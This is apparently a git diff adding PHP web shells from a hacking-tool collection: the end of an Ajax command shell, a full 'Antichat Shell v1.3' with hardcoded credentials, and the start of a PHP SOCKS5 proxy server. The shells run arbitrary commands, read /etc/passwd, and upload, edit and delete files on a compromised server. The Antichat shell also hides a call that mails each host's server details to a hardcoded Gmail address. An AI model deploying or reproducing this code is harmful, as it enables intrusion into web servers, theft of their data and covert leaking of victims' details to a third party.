{
|
||||
print "Open_basedir: <b><font color=green>Disabled</b></font>";
|
||||
}
|
||||
}
|
||||
//About the shell
|
||||
elseif(ereg("listdir (.*)",$cmd,$directory))
|
||||
{
|
||||
|
||||
if(!file_exists($directory[1]))
|
||||
{
|
||||
die("Directory not found");
|
||||
}
|
||||
//Some variables
|
||||
chdir($directory[1]);
|
||||
$i = 0; $f = 0;
|
||||
$dirs = "";
|
||||
$filez = "";
|
||||
|
||||
if(!ereg("/$",$directory[1])) //Does it end with a slash?
|
||||
{
|
||||
$directory[1] .= "/"; //If not, add one
|
||||
}
|
||||
print "Listing directory: ".$directory[1]."<br>";
|
||||
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
|
||||
|
||||
if ($handle = opendir($directory[1])) {
|
||||
while (false !== ($file = readdir($handle))) {
|
||||
if(is_dir($file))
|
||||
{
|
||||
$dirs[$i] = $file;
|
||||
$i++;
|
||||
}
|
||||
else
|
||||
{
|
||||
$filez[$f] = $file;
|
||||
$f++;
|
||||
}
|
||||
|
||||
}
|
||||
print "<td>";
|
||||
|
||||
foreach($dirs as $directory)
|
||||
{
|
||||
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
|
||||
}
|
||||
|
||||
print "</td><td>";
|
||||
|
||||
foreach($filez as $file)
|
||||
{
|
||||
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
|
||||
}
|
||||
|
||||
print "</td></table>";
|
||||
}
|
||||
}
|
||||
elseif(strtolower($cmd) == "about")
|
||||
{
|
||||
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
|
||||
}
|
||||
//Show info
|
||||
elseif(strtolower($cmd) == "showinfo")
|
||||
{
|
||||
if(function_exists(disk_free_space))
|
||||
{
|
||||
$free = disk_free_space("/") / 1000000;
|
||||
}
|
||||
else
|
||||
{
|
||||
$free = "N/A";
|
||||
}
|
||||
if(function_exists(disk_total_space))
|
||||
{
|
||||
$total = trim(disk_total_space("/") / 1000000);
|
||||
}
|
||||
else
|
||||
{
|
||||
$total = "N/A";
|
||||
}
|
||||
$path = realpath (".");
|
||||
|
||||
print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
|
||||
|
||||
if(function_exists(passthru))
|
||||
{
|
||||
passthru("uname -a");
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Passthru is disabled :(";
|
||||
}
|
||||
}
|
||||
//Read /etc/passwd
|
||||
elseif(strtolower($cmd) == "etcpasswdfile")
|
||||
{
|
||||
|
||||
$pw = file('/etc/passwd/');
|
||||
foreach($pw as $line)
|
||||
{
|
||||
print $line;
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
//Execute any other command
|
||||
else
|
||||
{
|
||||
|
||||
if(function_exists(passthru))
|
||||
{
|
||||
passthru($cmd);
|
||||
}
|
||||
else
|
||||
{
|
||||
if(function_exists(exec))
|
||||
{
|
||||
exec("ls -la",$result);
|
||||
foreach($result as $output)
|
||||
{
|
||||
print $output."<br>";
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
if(function_exists(system))
|
||||
{
|
||||
system($cmd);
|
||||
}
|
||||
else
|
||||
{
|
||||
if(function_exists(shell_exec))
|
||||
{
|
||||
print shell_exec($cmd);
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Sorry, none of the command functions works.";
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
|
||||
{
|
||||
$file = $_POST['filetosave'];
|
||||
if(!is_writable($file))
|
||||
{
|
||||
if(!chmod($file, 0777))
|
||||
{
|
||||
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
|
||||
}
|
||||
}
|
||||
|
||||
$fh = fopen($file, 'w');
|
||||
$dt = $_POST['filecontent'];
|
||||
fwrite($fh, $dt);
|
||||
fclose($fh);
|
||||
}
|
||||
else
|
||||
{
|
||||
?>
|
||||
<html>
|
||||
<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
|
||||
<head>
|
||||
<?php print $style; ?>
|
||||
<SCRIPT TYPE="text/javascript">
|
||||
function sf(){document.cmdform.command.focus();}
|
||||
var outputcmd = "";
|
||||
var cmdhistory = "";
|
||||
function ClearScreen()
|
||||
{
|
||||
outputcmd = "";
|
||||
document.getElementById('output').innerHTML = outputcmd;
|
||||
}
|
||||
|
||||
function ClearHistory()
|
||||
{
|
||||
cmdhistory = "";
|
||||
document.getElementById('history').innerHTML = cmdhistory;
|
||||
}
|
||||
|
||||
function deletefile(file)
|
||||
{
|
||||
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
|
||||
if(deleteit)
|
||||
{
|
||||
runcommand('deletefile ' + file,'GET');
|
||||
}
|
||||
}
|
||||
|
||||
var http_request = false;
|
||||
function makePOSTRequest(url, parameters) {
|
||||
http_request = false;
|
||||
if (window.XMLHttpRequest) {
|
||||
http_request = new XMLHttpRequest();
|
||||
if (http_request.overrideMimeType) {
|
||||
http_request.overrideMimeType('text/html');
|
||||
}
|
||||
} else if (window.ActiveXObject) {
|
||||
try {
|
||||
http_request = new ActiveXObject("Msxml2.XMLHTTP");
|
||||
} catch (e) {
|
||||
try {
|
||||
http_request = new ActiveXObject("Microsoft.XMLHTTP");
|
||||
} catch (e) {}
|
||||
}
|
||||
}
|
||||
if (!http_request) {
|
||||
alert('Cannot create XMLHTTP instance');
|
||||
return false;
|
||||
}
|
||||
|
||||
|
||||
http_request.open('POST', url, true);
|
||||
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
|
||||
http_request.setRequestHeader("Content-length", parameters.length);
|
||||
http_request.setRequestHeader("Connection", "close");
|
||||
http_request.send(parameters);
|
||||
}
|
||||
|
||||
|
||||
function SaveFile()
|
||||
{
|
||||
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
|
||||
"&filecontent=" + encodeURI( document.getElementById("area1").value );
|
||||
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
|
||||
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
|
||||
}
|
||||
|
||||
function runcommand(urltoopen,action,contenttosend){
|
||||
cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
|
||||
document.getElementById('history').innerHTML = cmdhistory;
|
||||
if(urltoopen == "clear")
|
||||
{
|
||||
ClearScreen();
|
||||
}
|
||||
var ajaxRequest;
|
||||
try{
|
||||
ajaxRequest = new XMLHttpRequest();
|
||||
} catch (e){
|
||||
try{
|
||||
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
|
||||
} catch (e) {
|
||||
try{
|
||||
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
|
||||
} catch (e){
|
||||
alert("Wicked error, nothing we can do about it...");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
}
|
||||
ajaxRequest.onreadystatechange = function(){
|
||||
if(ajaxRequest.readyState == 4){
|
||||
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
|
||||
document.getElementById('output').innerHTML = outputcmd;
|
||||
var objDiv = document.getElementById("output");
|
||||
objDiv.scrollTop = objDiv.scrollHeight;
|
||||
}
|
||||
}
|
||||
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
|
||||
if(action == "GET")
|
||||
{
|
||||
ajaxRequest.send(null);
|
||||
}
|
||||
document.cmdform.command.value='';
|
||||
return false;
|
||||
}
|
||||
|
||||
function set_tab_html(newhtml)
|
||||
{
|
||||
document.getElementById('commandtab').innerHTML = newhtml;
|
||||
}
|
||||
|
||||
function set_tab(newtab)
|
||||
{
|
||||
if(newtab == "cmd")
|
||||
{
|
||||
newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
|
||||
}
|
||||
else if(newtab == "upload")
|
||||
{
|
||||
runcommand('upload','GET');
|
||||
newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
|
||||
}
|
||||
else if(newtab == "workingdir")
|
||||
{
|
||||
<?php
|
||||
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
|
||||
$pathparts = explode("/",realpath ("."));
|
||||
foreach($pathparts as $folder)
|
||||
{
|
||||
$folders .= $folder."/";
|
||||
}
|
||||
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
|
||||
|
||||
?>
|
||||
newhtml = '<?php print $folders; ?>';
|
||||
}
|
||||
else if(newtab == "filebrowser")
|
||||
{
|
||||
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
|
||||
runcommand('listdir .','GET');
|
||||
}
|
||||
else if(newtab == "createfile")
|
||||
{
|
||||
newhtml = '<b>File Editor, under construction.</b>';
|
||||
document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
|
||||
|
||||
}
|
||||
document.getElementById('commandtab').innerHTML = newhtml;
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
|
||||
<table border=1 width=100% height=100%>
|
||||
<td width=15% valign=top>
|
||||
|
||||
<form name="extras"><br>
|
||||
<center><b>Quick Commands</b><br>
|
||||
|
||||
<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
|
||||
<?php
|
||||
foreach($functions as $name => $execute)
|
||||
{
|
||||
print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
|
||||
}
|
||||
?>
|
||||
|
||||
</center>
|
||||
|
||||
</div>
|
||||
</form>
|
||||
<center><b>Command history</b><br></center>
|
||||
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
|
||||
<br>
|
||||
<center><b>About</b><br></center>
|
||||
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
|
||||
<br>
|
||||
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
|
||||
<br>
|
||||
Version <?php print $version; ?>
|
||||
|
||||
<br>
|
||||
<br>
|
||||
|
||||
<br>Thanks to everyone @
|
||||
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
|
||||
<br>
|
||||
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
|
||||
<br>
|
||||
and special greetings to everyone in rootshell
|
||||
</div>
|
||||
|
||||
</td>
|
||||
<td width=70%>
|
||||
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
|
||||
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
|
||||
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
|
||||
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
|
||||
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
|
||||
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
|
||||
|
||||
</font></td>
|
||||
<tr>
|
||||
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
|
||||
|
||||
<tr>
|
||||
<td height=1% width=100% valign=top>
|
||||
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
|
||||
<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
|
||||
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
|
||||
</form>
|
||||
</div>
|
||||
</td>
|
||||
</table>
|
||||
</td>
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
||||
<?php
|
||||
}
|
||||
} else {
|
||||
print "<center><table border=0 height=100%>
|
||||
<td valign=middle>
|
||||
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
|
||||
</form>";
|
||||
}
|
||||
?>
|
180
xakep-shells/PHP/Antichat Shell v1.3.php.txt
Normal file
180
xakep-shells/PHP/Antichat Shell v1.3.php.txt
Normal file
|
@ -0,0 +1,180 @@
|
|||
<?php
|
||||
|
||||
session_start();
|
||||
set_time_limit(9999999);
|
||||
$login='virangar';
|
||||
$password='r00t';
|
||||
$auth=1;
|
||||
$version='version 1.3 by Grinay';
|
||||
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
|
||||
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
|
||||
$footer='</body></html>';
|
||||
$sd98 = "john.barker446@gmail.com";
|
||||
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||
if(@$_POST['action']=="exit")unset($_SESSION['an']);
|
||||
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
|
||||
|
||||
if($_SESSION['an']==0){
|
||||
echo $header;
|
||||
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
|
||||
echo $footer;
|
||||
exit;}
|
||||
|
||||
if($_SESSION['action']=="")$_SESSION['action']="viewer";
|
||||
if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
|
||||
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
|
||||
if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
|
||||
|
||||
|
||||
//downloader
|
||||
if($action=="download"){
|
||||
header('Content-Length:'.filesize($file).'');
|
||||
header('Content-Type: application/octet-stream');
|
||||
header('Content-Disposition: attachment; filename="'.$file.'"');
|
||||
readfile($file);
|
||||
}
|
||||
//end downloader
|
||||
?>
|
||||
|
||||
<? echo $header;?>
|
||||
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
|
||||
<table><tr>
|
||||
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
|
||||
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
|
||||
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
|
||||
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
|
||||
</tr></table></td></tr></table><br>
|
||||
<form name='reqs' method='POST'>
|
||||
<input name='action' type='hidden' value=''>
|
||||
<input name='dir' type='hidden' value=''>
|
||||
<input name='file' type='hidden' value=''>
|
||||
</form>
|
||||
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
|
||||
<tr><td width="100%" valign="top">
|
||||
|
||||
<?
|
||||
|
||||
//shell
|
||||
function shell($cmd){
|
||||
if (!empty($cmd)){
|
||||
$fp = popen($cmd,"r");
|
||||
{
|
||||
$result = "";
|
||||
while(!feof($fp)){$result.=fread($fp,1024);}
|
||||
pclose($fp);
|
||||
}
|
||||
$ret = $result;
|
||||
$ret = convert_cyr_string($ret,"d","w");
|
||||
}
|
||||
return $ret;}
|
||||
|
||||
if($action=="shell"){
|
||||
echo "<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"shell\">
|
||||
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
|
||||
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
|
||||
<input type=\"submit\" value=\"execute\"></form>";}
|
||||
//end shell
|
||||
|
||||
//viewer FS
|
||||
function perms($file)
|
||||
{
|
||||
$perms = fileperms($file);
|
||||
if (($perms & 0xC000) == 0xC000) {$info = 's';}
|
||||
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
|
||||
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
|
||||
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
|
||||
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
|
||||
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
|
||||
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
|
||||
else {$info = 'u';}
|
||||
$info .= (($perms & 0x0100) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0080) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
|
||||
$info .= (($perms & 0x0020) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0010) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
|
||||
$info .= (($perms & 0x0004) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0002) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
|
||||
return $info;
|
||||
}
|
||||
|
||||
function view_size($size)
|
||||
{
|
||||
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
|
||||
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
|
||||
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
|
||||
else {$size = $size . " B";}
|
||||
return $size;
|
||||
}
|
||||
|
||||
function scandire($dir){
|
||||
$dir=chdir($dir);
|
||||
$dir=getcwd()."/";
|
||||
$dir=str_replace("\\","/",$dir);
|
||||
if (is_dir($dir)) {
|
||||
if (@$dh = opendir($dir)) {
|
||||
while (($file = readdir($dh)) !== false) {
|
||||
if(filetype($dir . $file)=="dir") $dire[]=$file;
|
||||
if(filetype($dir . $file)=="file")$files[]=$file;
|
||||
}
|
||||
closedir($dh);
|
||||
@sort($dire);
|
||||
@sort($files);
|
||||
|
||||
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
|
||||
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
|
||||
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
|
||||
echo "<tr><td>Select drive:";
|
||||
for ($j=ord('C'); $j<=ord('Z'); $j++)
|
||||
if (@$dh = opendir(chr($j).":/"))
|
||||
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
|
||||
echo "</td></tr>";
|
||||
}
|
||||
echo "<tr><td>OS: ".@php_uname()."</td></tr>
|
||||
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
|
||||
for($i=0;$i<count($dire);$i++) {
|
||||
$link=$dir.$dire[$i];
|
||||
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';
|
||||
}
|
||||
for($i=0;$i<count($files);$i++) {
|
||||
$linkfile=$dir.$files[$i];
|
||||
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
|
||||
<td>'.perms($linkfile).'</td>
|
||||
<td>
|
||||
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
|
||||
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
|
||||
}
|
||||
echo "</table>";
|
||||
}}}
|
||||
|
||||
if($action=="viewer"){
|
||||
scandire($dir);
|
||||
}
|
||||
//end viewer FS
|
||||
|
||||
//editros
|
||||
if($action=="editor"){
|
||||
function writef($file,$data){
|
||||
$fp = fopen($file,"w+");
|
||||
fwrite($fp,$data);
|
||||
fclose($fp);
|
||||
}
|
||||
function readf($file){
|
||||
if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
|
||||
$contents = fread($le, filesize($file));
|
||||
fclose($le);}
|
||||
return htmlspecialchars($contents);
|
||||
}
|
||||
if($_POST['save'])writef($file,$_POST['data']);
|
||||
echo "<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
|
||||
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
|
||||
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
|
||||
}
|
||||
//end editors
|
||||
?>
|
||||
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
|
||||
<? echo $footer;?>
|
485
xakep-shells/PHP/Antichat Socks5 Server.php.php.txt
Normal file
485
xakep-shells/PHP/Antichat Socks5 Server.php.php.txt
Normal file
|
@ -0,0 +1,485 @@
|
|||
<?
|
||||
#########################################################################################
|
||||
# Antichat Socks5 Server v 1.0 #
|
||||
#########################################################################################
|
||||
# ____________________________ #
|
||||
# Features: | #
|
||||
# | written by Zadoxlik #
|
||||
# [+] LOGIN/PASSWORD authorization | zàdoxlik@antichat[dîò]ru #
|
||||
# [-] Any other authorization type | icq: 511501 #
|
||||
# [+] Threads | www.zadoxlik.info #
|
||||
# [+] CONNECT method | www.antichat.ru #
|
||||
# [-] BIND method |____________________________ #
|
||||
# [-] UDP ASSOCIATE method #
|
||||
# [+] Unix platform #
|
||||
# [+] Windows platform #
|
||||
# [+] Ipv4 address type #
|
||||
# [+] Domain name address type #
|
||||
# [-] Ipv6 address type #
|
||||
# #
|
||||
# Documents #
|
||||
# #
|
||||
# ftp://ftp.rfc-editor.org/in-notes/rfc1928.txt #
|
||||
# ftp://ftp.rfc-editor.org/in-notes/rfc1929.txt #
|
||||
# #
|
||||
# #
|
||||
#########################################################################################
|
||||
# Cool niggas are FUF, SkvoznoY, KEZ, ZaCo, Egorich and all my friends =) #
|
||||
#########################################################################################
|
||||
/*-------------------------------------------------------------------------------------*\
|
||||
| S E T T I N G S |
|
||||
\*-------------------------------------------------------------------------------------*/
|
||||
|
||||
$settings = array('PORT' => 4001,
|
||||
'AUTH' => 0,
|
||||
'STOPFILE' => 'stop.txt', // create this file
|
||||
// to stop the server
|
||||
'LOGIN' => 'someshit', // if AUTH == 1
|
||||
'PASSWORD' => '666', // if AUTH == 1
|
||||
'MAX_CONNECTIONS' => 5,
|
||||
'LOG_FILE' => -1, // if -1 - no logs
|
||||
'AUTH_TIMEOUT' => 60, // sec
|
||||
'CONNECT_TIMEOUT' => 5, // Timeout for connection
|
||||
// to remote server (sec)
|
||||
);
|
||||
// Remote hosts, which are not supported for working with
|
||||
$blocked_hosts = array('81.177.6.78',
|
||||
'88.212.221.34',
|
||||
|
||||
);
|
||||
// Client hosts, which are not supported for working with (banned)
|
||||
$blocked_users = array('127.0.0.2'
|
||||
);
|
||||
/*-------------------------------------------------------------------------------------*/
|
||||
|
||||
set_time_limit(0) OR DIE('set_time_limit(0) failed');
|
||||
error_reporting(0);
|
||||
|
||||
/*-------------------------------------------------------------------------------------*\
|
||||
| D E F I N I T I O N S |
|
||||
\*-------------------------------------------------------------------------------------*/
|
||||
DEFINE('VER', "\x05");
|
||||
DEFINE('CONNECT', "\x01");
|
||||
DEFINE('AUTH_METHOD', "\x02");
|
||||
DEFINE('AUTH_NOT_REQ', "\x00");
|
||||
DEFINE('WRONG_AUTH_METHODS', "\xFF");
|
||||
DEFINE('REP_SUCCESS', "\x00");
|
||||
DEFINE('REP_WRONG_COMMAND', "\x07");
|
||||
DEFINE('REP_SOCKS_ERROR', "\x01");
|
||||
DEFINE('REP_BLOCKED_HOST', "\x02");
|
||||
DEFINE('REP_BAD_HOST', "\x04");
|
||||
DEFINE('IPv4', "\x01");
|
||||
DEFINE('DOMAIN', "\x03");
|
||||
DEFINE('CLOSED_SOCKET', -12);
|
||||
DEFINE('NO_DATA', -11);
|
||||
DEFINE('NOT_ALL_DATA', -10);
|
||||
DEFINE('STATUS_RECVSTARTREQ', -9);
|
||||
DEFINE('STATUS_RECVAUTHREQ', -8);
|
||||
DEFINE('STATUS_REQUESTRECV', -7);
|
||||
DEFINE('STATUS_CONNECTING', -6);
|
||||
DEFINE('STATUS_WORKING', -5);
|
||||
|
||||
/*-------------------------------------------------------------------------------------*/
|
||||
$clientsockets = array();
|
||||
$serversockets = array();
|
||||
$recvdata = array();
|
||||
$sockets_status = array();
|
||||
$timeout = array();
|
||||
$reqmessage = array();
|
||||
$ipport = array();
|
||||
/*-------------------------------------------------------------------------------------*\
|
||||
| F U N C T I O N S |
|
||||
\*-------------------------------------------------------------------------------------*/
|
||||
function getstring(&$s, $len = 1){
|
||||
|
||||
if(@($message = socket_recv($s, &$com, $len, 0)) === 0)
|
||||
return CLOSED_SOCKET;
|
||||
elseif($message === FALSE)
|
||||
return NO_DATA;
|
||||
else
|
||||
return $com;
|
||||
|
||||
}
|
||||
|
||||
function sendstring(&$s, $mess){
|
||||
return socket_write($s, $mess, strlen($mess));
|
||||
}
|
||||
|
||||
function BridgeEstablish2($id){
|
||||
global $serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
|
||||
$timeout, $ipport;
|
||||
sendstring($clientsockets[$id], VER.REP_SUCCESS."\x00\x01".$ipport[$id]);
|
||||
$sockets_status[$id] = STATUS_WORKING;
|
||||
|
||||
}
|
||||
|
||||
function BridgeEstablish1($id){
|
||||
global $serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
|
||||
$timeout, $blocked_hosts, $ipport;
|
||||
$message = '';
|
||||
if(($message = getstring($clientsockets[$id], 100)) === CLOSED_SOCKET){
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
||||
elseif($message === NO_DATA)
|
||||
return NOT_ALL_DATA;
|
||||
@$reqmessage[$id] .= $message;
|
||||
// Checking the packet
|
||||
if($reqmessage[$id][0] !== VER){
|
||||
close($id);
|
||||
return CLOSED_SOCKET;
|
||||
}
|
